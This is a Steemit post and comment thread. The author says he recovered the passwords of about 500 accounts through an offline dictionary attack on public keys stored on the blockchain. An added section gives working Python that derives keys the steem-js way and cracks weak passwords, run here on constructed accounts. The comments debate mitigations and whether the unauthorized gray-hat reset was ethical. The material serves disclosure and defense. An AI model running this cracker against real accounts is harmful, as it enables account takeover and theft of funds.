Moments ago I changed the owner/active/posting/memo keys of ~500 Steem accounts.
I changed their keys to Steemit's key so Steemit can allow these users to regain access via the recovery mechanism they established.
I was able to do this because I was able to guess these accounts' passwords.
I was able to guess their passwords because of what I would argue is a flaw in Steem's UI. Specifically, it currently allows user-chosen passwords by default. In most applications user-chosen passwords are not problematic. However, they are problematic in this use-case because a scrambled form of each user's password must be stored on Steem's public blockchain, meaning anyone with a copy of the blockchain can mount a large-scale offline dictionary attack to recover them. Research as well as real-world precedent has repeatedly shown that a non-trivial fraction of users are incapable of choosing passwords resistant to offline attack even when password complexity requirements are enforced.
Forcing machine-generated passwords in the UI for owner/active keys would be one possible step towards mitigation. I'm aware of the usability counter-argument to this suggestion. However, consider that my effort expended ~1 USD of computing resources and ended up recovering the credentials of accounts with liquid assets valued in the thousands and semi-liquid assets (SP) in the tens of thousands. Given this fact, it would be hopelessly naive to assume offline attacks will not be attempted in the future at much greater scale and by totally bad actors.
I invite others with constructive mitigation ideas to share them.
One further point, unless explicitly invited by Steemit, I will not attempt any future white hat shenanigans. My motivation was to alert this community to a genuine danger and do so in a manner that hopefully leaves a more lasting impression than yet another "how to pick a strong password" snorefest post.
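What the post describes, as an added example that is not the author's code and not anything from the Steem code base: an offline dictionary attack against brain-key-derived public keys. To the best of my understanding of steem-js (PrivateKey.fromLogin), the private key is SHA-256 over account name + role + password, and the on-chain STM string is base58 over the compressed secp256k1 public key followed by a 4-byte RIPEMD-160 checksum. Every guess therefore costs one SHA-256 and one scalar multiplication, with no salt beyond the public account name and role and no key stretching. The curve arithmetic below is pure Python and slow on purpose; the accounts, passwords and wordlist are constructed, and generate_password is a stand-in for a machine-generated password, not Steemit's own suggest-password format.

```python
import hashlib
import secrets

# secp256k1 domain parameters (the curve Steem/Graphene keys live on)
CURVE_P = 2**256 - 2**32 - 977
SECP256K1_G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
               0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Constructed wordlist standing in for a real password dictionary.
WORDLIST = ["123456", "password", "qwerty", "letmein", "steemit", "steemit2016", "dragon"]


def _ec_add(p1, p2):
    """Affine point addition on secp256k1; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % CURVE_P == 0:
            return None
        lam = (3 * x1 * x1) * pow((2 * y1) % CURVE_P, -1, CURVE_P) % CURVE_P
    else:
        lam = (y2 - y1) * pow((x2 - x1) % CURVE_P, -1, CURVE_P) % CURVE_P
    x3 = (lam * lam - x1 - x2) % CURVE_P
    return x3, (lam * (x1 - x3) - y1) % CURVE_P


def _ec_mul(k, point):
    """Double-and-add scalar multiplication (pure Python; fine for a demo)."""
    result = None
    while k:
        if k & 1:
            result = _ec_add(result, point)
        point = _ec_add(point, point)
        k >>= 1
    return result


def private_key_from_login(account, password, role):
    """Brain-key rule as in steem-js PrivateKey.fromLogin (assumed):
    priv = SHA-256(account + role + password). No stretching, no secret salt."""
    seed = (account + role + password).encode()
    return int.from_bytes(hashlib.sha256(seed).digest(), "big")


def public_key_bytes(priv):
    """33-byte compressed public key, the payload inside an STM... string."""
    x, y = _ec_mul(priv, SECP256K1_G)
    return bytes([2 + (y & 1)]) + x.to_bytes(32, "big")


def decode_stm_public_key(stm):
    """Strip 'STM', base58-decode: 33-byte key + 4-byte RIPEMD-160 checksum.
    The checksum is verified only if this OpenSSL build offers ripemd160."""
    if not stm.startswith("STM"):
        raise ValueError("not an STM public key")
    n = 0
    for ch in stm[3:]:
        n = n * 58 + B58_ALPHABET.index(ch)
    raw = n.to_bytes(37, "big")
    key, check = raw[:33], raw[33:]
    try:
        rmd = hashlib.new("ripemd160")
    except ValueError:
        rmd = None  # RIPEMD-160 not available here; skip the checksum
    if rmd is not None:
        rmd.update(key)
        if rmd.digest()[:4] != check:
            raise ValueError("STM checksum mismatch")
    return key


def crack_accounts(targets, wordlist):
    """Offline dictionary attack. targets = {account: {role: compressed_pubkey}},
    exactly what anyone can read off the chain. Returns {account: password}."""
    found = {}
    for account, keys in targets.items():
        for guess in wordlist:
            for role, onchain in keys.items():
                if public_key_bytes(private_key_from_login(account, guess, role)) == onchain:
                    found[account] = guess
                    break
            if account in found:
                break
    return found


def generate_password(nbytes=32):
    """Machine-generated alternative: 256 bits from the OS CSPRNG, base58-encoded."""
    n = int.from_bytes(secrets.token_bytes(nbytes), "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = B58_ALPHABET[rem] + out
    return out


def demo_targets():
    """Constructed sample: three accounts keyed from weak passwords, one from a
    generated password. Not real chain data."""
    weak = {"alice": "password", "bob": "letmein", "carol": "steemit2016"}
    targets = {a: {"owner": public_key_bytes(private_key_from_login(a, pw, "owner"))}
               for a, pw in weak.items()}
    targets["dave"] = {"owner": public_key_bytes(private_key_from_login("dave", generate_password(), "owner"))}
    return targets, weak


if __name__ == "__main__":
    targets, _ = demo_targets()
    print(crack_accounts(targets, WORDLIST))  # the three weak accounts; dave survives
```

Even with this toy arithmetic the weak accounts fall out in well under a second; libsecp256k1 on a CPU or a GPU kernel does orders of magnitude more guesses per second, which is how ~1 USD of compute covers hundreds of accounts. Contrast a conventional web login, where a server-side slow hash and rate limiting stand between the guess and the answer: here the chain hands the verifier to everyone.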
Yup, this is exactly what I have been shouting about for weeks now and expected would eventually happen. I am happy that you are a white hat and didn't take control of the accounts for yourself to profit from.
I believe it is better to push away new users with less user friendly registration (that forces them to use a randomly generated key that they must store securely and use password managers to manage) than to bring them aboard easily only to completely piss them off when their account or funds are stolen [1]. It is our job to make it as user-friendly as possible and to provide great resources educating users how to generate and manage random high-entropy passwords. But I don't agree with compromising their security because it is "too hard" and we don't want to lose them as new users.
[1] Although the new recovery feature allows them to get their account back. Most funds are usually locked in the time-locked Steem Power, so hopefully not too much financial damage would be done by the time they recover their account. And there are plans for a user opt-in and configurable time-locked savings account to even protect their more liquid STEEM and Steem Dollar funds from being stolen by hackers assuming they recover their account in a few days.
… we are in need of a bug bounty program with high rewards, so that people are happy to publish the flaws instead of misusing them for their own profit in the short run! Thank you for being honest and alarming the devs and community - and not running with the money …!
Chapeau !
and tipping is always an option as well - thx again!
I WILL donate/contribute my rewards gotten out of my comments here @robinhood as well, and you guys here should consider doing this as well... if everybody here WILL do this I'd double the comment payment amount to donate out of my pocket again!
@cass - the largest flaw now in my opinion is the overgrowing "tag-spamming" people do. When you have, for example, in the top 12 of the "marijuana" topic just 3 related ones, the platform has a massive problem. This gets worse hour by hour and people tag nearly all their posts wrong.
@wackou - thanks for your upvote... I wrote an article today on the topic. It would be a really interesting thing what a whale (like you) says to the actual situation, as you too think tag-spam is getting to be a real pain. Would be great to get some words from you:
https://steemit.com/money/@hastla/why-whales-and-dolphins-have-to-start-work-for-steemit-or-lose-their-whole-investment
Happy to introduce anyone to Jacob at Cobalt - best bug bounties with a specialization in cryptocurrency companies.
first official STEEM LOTTERY https://steemit.com/lottery/@willytrader/first-official-steem-lottery
This is something I'm really concerned about arhag, do you have any information I can use at the moment to protect myself further?
I do actually. I just wrote this post about the importance of using password managers.
Thank you arhag, I had a look and have in fact been using LastPass, but I've found a few issues; it seems to be interfering with things, for example on Bittrex it keeps trying to autocomplete the boxes in which I write trade values, so I had to turn it off. Do you know any workaround for this or perhaps an alternative? Cheers.
I don't use LastPass so I can't give you specific instructions. But you should be able to disable its autofill functionality on specific websites that it has trouble with, while still taking advantage of it on nearly every other website. It may also be possible to manually fix the issue specifically for the Bittrex site so that you can even still use autofill on its website without having LastPass autofill in the wrong boxes.
This link may be helpful:
https://lastpass.com/support.php?cmd=getfeaturefaq&feature=feataure_4
Amazing work and really making a difference in how we all move forward in the world.
hi @arhag, please check my latest post out. I wrote it to you and the other whales. Maybe you will agree with it :)
https://steemit.com/steemit/@steemitpolitics/6rqxnc-to-the-whales-get-your-head-out-of-your-ass-and-vote-good-content-up-you-are-harming-steemit
I will upvote every White Hat hackers post that will help us secure more our platform! And I hope that will give them the motivation to continue working for our security!
Upvoting for visibility (and the Spaceballs reference), but not without much conflict. More people need to understand how serious password security is and the need for a good password manager. At the same time, I don't want to condone grey hat activity.
There were other ways to handle this that would have been true white hat. You could have checked those ~500 passwords, verified them, and then contacted the Steemit team privately. I've been posting in the Slack channel about the need for a private bug bounty program like Bugcrowd for exactly that purpose. There should also be an easy to find ethical disclosure procedure.
In this case, however, was it really Steemit's fault or a PEBKAC (Problem Exists Between Keyboard and Chair)? All attempts at creating idiot proof software fail as better idiots are produced.
I hope you can work with the Steemit team in an ethical manner in the future. I know I'm coming across as judgemental here, and it's possible you actually saved a lot of people from a lot of trouble. It still just feels wrong. Either way, I wouldn't want to get on your bad side. :)
I don't fault the OP. This is a classic scenario where you don't fully comprehend the gravity unless it happens. I also like the fact that the OP is being financially compensated for his discovery. I hired my first CTO after he rooted our mail server!
You might be right, Bill. I guess I'm just much more comfortable with white hat activities. We use BugCrowd for FoxyCart and have been very happy with the professionalism and ethics of those involved. When something is exposed (thankfully it's almost always some third party system outside of our PCI environment), it's hard not to take it very seriously. From what I've seen of the team here so far, I think they would have taken a white hat approach seriously also. But... maybe not. As I said, whether or not I like it, this approach may have saved quite a few people from even more frustration.
can you get in touch with me on the slack channel?
(my name there is also liondani)
It is about a steemit user who "lost" his owner key and desperately needs help: @tonyson (lost owner key); now he posts under his new account @hien-tran. Read his post about the "hack": https://steemit.com/steemit/@hien-tran/i-wonder-if-you-could-help-me-with-my-account
Co-founder of steemit @ned encouraged him to get in touch with you and that was a great idea in my opinion (I don't know if he has already reached you; his English is poor). I will appreciate it very much if you helped him "recover" his keys.... It is obvious that the funds he has lost are significant for him (he lives with his little son in Vietnam).... I can imagine it will change his life if he can have access to his funds! Thanks in advance and please make a post about it so we can tip you for helping a dedicated community member. Thanks
Sorry but I can't help this user - I checked my logs and @tonyson was not one of the accounts that I updated.
The accounts I updated had their keys changed to either
STM7kyb6WK6Sg9Eu4uu7WGqjYdqJzdBeKEWVDaDEKsgvhvESJZ1vM
or STM65wH1LZ7BfSHcK69SShnqCAH5xdoSZpGkUjmzHJ5GCuxEK9V5G
which are the owner keys for @steemit and @steemit3 respectively.
robinhood, can you send me an email ned at steemit dot com
Sure. Sent you a message a moment ago. May hit your spam folder since it just said "hi".
I can say nothing here except thank you! This really should be the most upvoted topic of the day. Here's an upvote from me!
Nice job and thanks!
Hm. I vote that you continue to do this and make posts about how you did it, and what recommendations you made.
I promise I will upvote you every time I see it :P
You're the first white hat I've seen doing these sorts of white hat things in crypto since I got in the game a year ago!
Thanks for a great whitehat hack @robinhood
People need to READ THIS AND TAKE SECURITY SERIOUSLY!!!!
https://steemit.com/steemit/@fyrstikken/steemit-security-exchanges-and-why-by-a-guy-that-has-been-in-crypto-since-2009-new-people-read-this-now
That's pretty terrifying, and it's a good job that you posted this... It hadn't occurred to me that of course hashed passwords are going to be freely available offline, because in using a web UI you're used to the assumptions of a traditional web model.
Good on you (assuming you did what you said) for just reassigning back to Steemit. Sounds like we do really need 2FA or generated only passwords... It's a shame that browser tooling around SSL client certs is so user unfriendly, having a client cert as a per-browser alternative to the generated password would be a good way of removing the usability barrier. Users would obviously still have to store their password but they could use the installed client cert for day-to-day auth and just use the password for requesting new certs for new devices.
This is why I proposed 2FA. I understand 2FA is hard to implement on the blockchain but as the saying goes "when there is a will there is a way". I feel very unsafe on this platform without 2FA. Please read this https://steemit.com/steemit/@domavila/two-factor-authentication-and-why-we-need-it-now
Very interesting, so is this just a problem with user-generated passwords?
Thanks
CG
I dug into the code for the "suggest password" option Steem provides at signup and as far as I could tell the logic there was 100% kosher.
what does that mean? Was it good?
Yes.
100% kosher = Good
That's a double-edged sword. Users either won't be able to register or will lose keys and lose money anyway.
The only way I see is 2FA; still complex, but the most friendly of all of these.
wow! so basically you hacked 500 accounts and gave the keys back to steemit!?
well good job!
WHY DON'T WE HAVE GOOGLE AUTHENTICATORS?
hopefully leaves a more lasting impression than yet another
Spaceballs is my favorite movie :)
Hopefully steemit will realize this is something of HIGH relevance and importance, since most of the people don't know how to pick passwords (and most of those also use the same password for many identities: mail, facebook, and more). Thanks for your post, very appreciated!
upvote back the ones that upvote you
I'm actually kind of surprised. When they said that the hacker had private keys, I was thinking he could hashcat them to get passwords... but I figured with 16 characters that would take an unreasonable amount of time.
I figured with a 16 digit password even the weakest passwords would be relatively hard to guess... though I do support 2FA
http://keepass.info/
It's a cool concept, but I'm sorry, I call BS.
I have looked at the code that handles hashing, salting and encrypting passwords before they are placed into the block chain and I can say with 99.5% certainty that you did not accomplish the hack you claim to have.
In theory it is possible, but the computational complexity of uncovering even 1 of the passwords from the blockchain would be more difficult than mining the largest amount held by any user on the block chain.
Sorry to hurt your feelings and call you out, but if you are to fool this community you are going to need to prove that (a) you have the knowledge required to mount such a large scale offline attack, and (b) you would have mentioned the actual difficulty of doing so.
They didn't claim to crack any hashing algorithm. A dictionary attack simply goes through a dictionary of possible passwords and tries each one until it finds a matching hash. Might want to reconsider that 0.5% chance.
I changed it now.
Steemit will grow bigger as a community. And with monetary rewards involved, we should expect and, maybe even accept people with different views and beliefs and motives.
From this post, it might just spell the beginning of many exciting things to happen here. Wherever blackhats exist, we just pray hard more whitehats appear. With the increasing popularity, this community will definitely grow, and perhaps it's a good sign that @robinhood is here, helping us in his own ways.
Even though it indeed is wiser to leave the 'bad guys' to the 'cops' (devs), I guess it doesn't suck if we have a @robinhood around that we can trust, as this community grows.
To the whitehats around!
@robinhood : you are just awesome. I cannot think about how much the steem community and especially the developers need to thank you. You are incredible. Thanks for that.
Anyone have a recommended method of machine-generating a password?
Thanks a lot for the words of advice. Namaste :)
Holy crap I'm glad you guys are a lot smarter than I am.
Up vote for space balls photo
Keep up the good work!!
Thanks, I guess?
I'm glad you didn't do anything malicious with this great power. Key management when left to the general public is likely dangerous. Hopefully if they lose money once, they'll learn their lesson.
Will the new 32-character password requirement prevent any future dictionary attack?
I think this is probably good, to get such simple things done during the childhood of a crypto, lest we have a DAO scandal on Steem in a year. lol
Look at you, so young and carefree :-)
great to see someone getting on the topic and doing something about it, this was completely necessary
TBH, I think this is a pretty shitty thing to do. It definitely isn't ethical hacking, and one can only hope that the owners pursue legal measures if your claims are true.
I agree with your point.. but I don't think you should be fucking with other people's money to make it.
Sigmajin, based on this comment and your last, I'm not sure you 100% understand the situation.
OK, I was a little pissy; Bittrex is fucking with my money.
Anyway:
1. Yeah, I get that the private key obviates the need for the password here... my concern at the time was that after the users got their accounts back, the hacker could take the key, work their way backward to the user's password, then use that password to attack other accounts.
2. So what happens if the value of their assets decreases by 50% while they're messing around with password recovery?
3. You could have proved your point by contacting TPTB with the password list. Or upvoting this post.. or running some kind of script to make them all post horse pornography every few hours until they changed their password.
I know if it happened to me, I'd be pissed (even though I don't keep a ton of money here)... I guess I'm not behind it but I realize it was well intentioned.
Also
Yeah, don't know if you saw my post pointing it out, but I think the 7-14 attack came from @goodgame... the script he was using is still in all of his posts if it's him, and the domain it was pinging (steemit.uk) was registered that day. https://steemit.com/doyourpart/@sigmajin/um-this-guy-is-trying-to-do-something-bad-right
I'm actually shocked by this. There is really no legal distinction between "white hats" and "black hats". Nobody gave "robinhood" permission to hack 500 Steemit accounts. "robinhood", in fact, did "take the money"... since only "robinhood" now has access to these funds.
Incorrect, as I stated in my post, I updated these accounts to Steemit's key (not my key) so only Steemit has access to the funds. This fact can be verified by inspecting the blockchain.